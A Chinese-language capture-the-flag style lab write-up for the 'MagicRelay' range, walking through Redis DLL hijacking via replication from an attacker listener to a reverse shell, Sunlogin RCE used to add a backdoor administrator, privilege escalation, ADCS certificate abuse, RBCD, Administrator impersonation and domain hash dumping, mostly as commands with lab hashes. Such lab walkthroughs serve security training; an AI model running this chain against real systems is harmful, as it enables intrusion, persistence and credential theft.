春秋云镜系列靶场通过记录-MagicRelay

admin 2025年6月30日00:59:24评论0 views字数 5133阅读17分6秒阅读模式

信息收集

./fscan_mac_arm64 -h 39.99.154.72

   ___                              _    
  / _     ___  ___ _ __ __ _  ___| | __ 
 / /_/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\_______ (__| | | (_| | (__|   <    
____/     |___/___|_|  __,_|___|_|_   
                     fscan version: 1.8.4
start infoscan
39.99.154.72:6379 open
[*] alive ports len is: 1
start vulscan
[+] Redis 39.99.154.72:6379 unauthorized file:C:Program FilesRedis/dump.rdb
已完成 1/1
[*] 扫描结束,耗时: 10.037483542s

开放了6379端口,并且存在未授权

redis dll劫持+主从复制

春秋云镜系列靶场通过记录-MagicRelay
img

看到是windows开的redis服务,所以我们想到的很多linux上的服务在这里都法实现,所以去看了其他师傅的利用姿势,发现是用的dll劫持。 参考: https://github.com/JKme/sb_kiddie-/blob/master/hacking_win/dll_hijack/DLLHijacker.py

不过这里有一个坑点就是在编译的时候一定要关闭一些东西

春秋云镜系列靶场通过记录-MagicRelay春秋云镜系列靶场通过记录-MagicRelay

需要配置一下然后编译,利用以下项目打一个主从复制

https://github.com/r35tart/RedisWriteFile

python3 RedisWriteFile.py --rhost 39.99.154.72  --rport 6379 --lhost 47.101.63.120  --lport 16379 --rpath 'C:Program FilesRedis' --rfile 'dbghelp.dll' --lfile 'dbghelp.dll'

然后执行命令

春秋云镜系列靶场通过记录-MagicRelay
img

之后cs就会收到反弹回来的shell

春秋云镜系列靶场通过记录-MagicRelay
img

内网渗透

咱们上传代理工具和内网扫描工具,在这之前可以知道这台redis是在域内的主机

春秋云镜系列靶场通过记录-MagicRelay
img

那在看看fscan的扫描记录

   ___                              _    
  / _     ___  ___ _ __ __ _  ___| | __ 
 / /_/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\_______ (__| | | (_| | (__|   <    
____/     |___/___|_|  __,_|___|_|_   
                     fscan version: 1.8.1
start infoscan
(icmp) Target 172.22.12.6     is alive
(icmp) Target 172.22.12.12    is alive
(icmp) Target 172.22.12.25    is alive
(icmp) Target 172.22.12.31    is alive
[*] Icmp alive hosts len is: 4
172.22.12.6:88 open
172.22.12.25:6379 open
172.22.12.31:445 open
172.22.12.25:445 open
172.22.12.12:445 open
172.22.12.6:445 open
172.22.12.31:139 open
172.22.12.25:139 open
172.22.12.6:139 open
172.22.12.12:139 open
172.22.12.31:135 open
172.22.12.25:135 open
172.22.12.6:135 open
172.22.12.12:135 open
172.22.12.31:80 open
172.22.12.12:80 open
172.22.12.31:21 open
[*] alive ports len is: 17
start vulscan
[+] NetInfo:
[*]172.22.12.25
   [->]WIN-YUYAOX9Q
   [->]172.22.12.25
[+] Redis:172.22.12.25:6379 unauthorized file:C:Program FilesRedis/dump.rdb
[+] NetInfo:
[*]172.22.12.6
   [->]WIN-SERVER
   [->]172.22.12.6
[+] NetInfo:
[*]172.22.12.12
   [->]WIN-AUTHORITY
   [->]172.22.12.12
[*] 172.22.12.6  (Windows Server 2016 Standard 14393)
[*] 172.22.12.31         WORKGROUPWIN-IISQE3PC      
[+] NetInfo:
[*]172.22.12.31
   [->]WIN-IISQE3PC
   [->]172.22.12.31
[*] 172.22.12.6    [+]DC XIAORANGWIN-SERVER        Windows Server 2016 Standard 14393
[+] ftp://172.22.12.31:21:anonymous 
   [->]SunloginClient_11.0.0.33826_x64.exe
[*] 172.22.12.12         XIAORANGWIN-AUTHORITY     Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.12.12       code:200 len:703    title:IIS Windows Server
[*] WebTitle:http://172.22.12.31       code:200 len:703    title:IIS Windows Server
[+] http://172.22.12.12 poc-yaml-active-directory-certsrv-detect 

[03/31 16:56:43] [+] received output:
172.22.12.6    DC:WIN-SERVER.xiaorang.lab  域控
172.22.12.25   WIN-YUYAOX9Q.xiaorang.lab  Redis服务器
172.22.12.31   WORKGROUPWIN-IISQE3PC  IIS网站 ftp匿名 向日葵
172.22.12.12   WIN-AUTHORITY.xiaorang.lab  CA服务器

看到172.22.12.31这台主机存在ftp匿名登录并且里面有一个向日葵的客户端,并且这个版本存在rce

向日葵rce cnvd-2022-10270

参考: https://github.com/Mr-xn/sunlogin_rce/releases/tag/new

把利用工具上传到入口主机进行利用

xrkRce.exe -h 172.22.12.31 -t scan
春秋云镜系列靶场通过记录-MagicRelay
img
xrkRce.exe -h 172.22.12.31 -t rce -p 49686 -c "whoami"
春秋云镜系列靶场通过记录-MagicRelay
img

添加一个后门用户

xrkRce.exe -h 172.22.12.31  -t rce -p 49685 -c "net user ocean admin@123 /add"
xrkRce.exe -h 172.22.12.31  -t rce -p 49685 -c "net localgroup administrators ocean /add"

顺便读个flag

春秋云镜系列靶场通过记录-MagicRelay
img

域渗透

收集下域内信息,首先在redis拿台服务器上提个权提到system,用土豆提权就行

春秋云镜系列靶场通过记录-MagicRelay
img

上传 sharpHound.exe工具收集一波,但是好像没啥用,前面fscan扫描出来有adcs漏洞

春秋云镜系列靶场通过记录-MagicRelay
img

这是一些证书,用certipy-ad找一波漏洞,但是我们没有账户密码但是有redis拿台机器的hash所以可以用它来创建一个机器用户

春秋云镜系列靶场通过记录-MagicRelay
img

在打之前先配置下hosts

172.22.12.6 WIN-SERVER.xiaorang.lab
172.22.12.12 WIN-AUTHORITY.xiaorang.lab
172.22.12.12 xiaorang-WIN-AUTHORITY-CA
proxychains4 certipy-ad  account create -u WIN-YUYAOX9Q$ -hashes e611213c6a712f9b18a8d056005a4f0f -dc-ip 172.22.12.6 -user ocean -dns WIN-SERVER.xiaorang.lab -debug
春秋云镜系列靶场通过记录-MagicRelay
img
Successfully created account 'ocean$' with password 'OmSFbGEnso0q6B2D'

先申请一个证书模版

proxychains4 -q certipy-ad req -u '[email protected]' -p 'OmSFbGEnso0q6B2D' -ca 'xiaorang-WIN-AUTHORITY-CA' -target 172.22.12.12 -template 'Machine' -debug -dc-ip 172.22.12.6
春秋云镜系列靶场通过记录-MagicRelay
img
proxychains4 -q certipy-ad auth -pfx win-server.pfx -dc-ip 172.22.12.6 -debug

这样会报错,报错的原因是域控制器没有安装用于智能卡身份验证的证书,解决办法的话就是尝试 Schannel,通过 Schannel将证书传递到 LDAPS, 修改 LDAP 配置 (例如配置 RBCD / DCSync), 进而获得域控权限。这是参考wh1teSu师傅打的

首先将pfx导出为.key 和.crt 两个文件(空密码)

openssl pkcs12 -in win-server.pfx -nodes -out test.pem
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt

参考: https://whoamianony.top/posts/pass-the-certificate-when-pkinit-is-nosupp/ https://github.com/AlmondOffSec/PassTheCert/blob/main/Python/passthecert.py

proxychains -q python3 passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.12.6
春秋云镜系列靶场通过记录-MagicRelay
img

将证书配置到域控的RBCD

proxychains -q python3 passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.12.6 -delegate-to 'win-server$' -delegate-from 'ocean$'
春秋云镜系列靶场通过记录-MagicRelay
img

申请ST,导入票据,无密码登录即可。

proxychains -q impacket-getST xiaorang.lab/'ocean$':'OmSFbGEnso0q6B2D' -spn cifs/win-server.xiaorang.lab -impersonate Administrator -dc-ip 172.22.12.6
export KRB5CCNAME=Administrator@[email protected]
proxychains -q impacket-psexec [email protected] -k -no-pass -dc-ip 172.22.12.6 -codec gbk
春秋云镜系列靶场通过记录-MagicRelay
img

把域中的hash都导出来

proxychains -q impacket-secretsdump 'xiaorang.lab/[email protected]' -target-ip 172.22.12.6 -no-pass -k
春秋云镜系列靶场通过记录-MagicRelay
img

然后打pth

proxychains4 -q python3 psexec.py -hashes :aa95e708a5182931157a526acf769b13 xiaorang.lab/[email protected]

原文始发于微信公众号(土拨鼠的安全屋):春秋云镜系列靶场通过记录-MagicRelay

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月30日00:59:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   春秋云镜系列靶场通过记录-MagicRelayhttps://cn-sec.com/archives/4206907.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息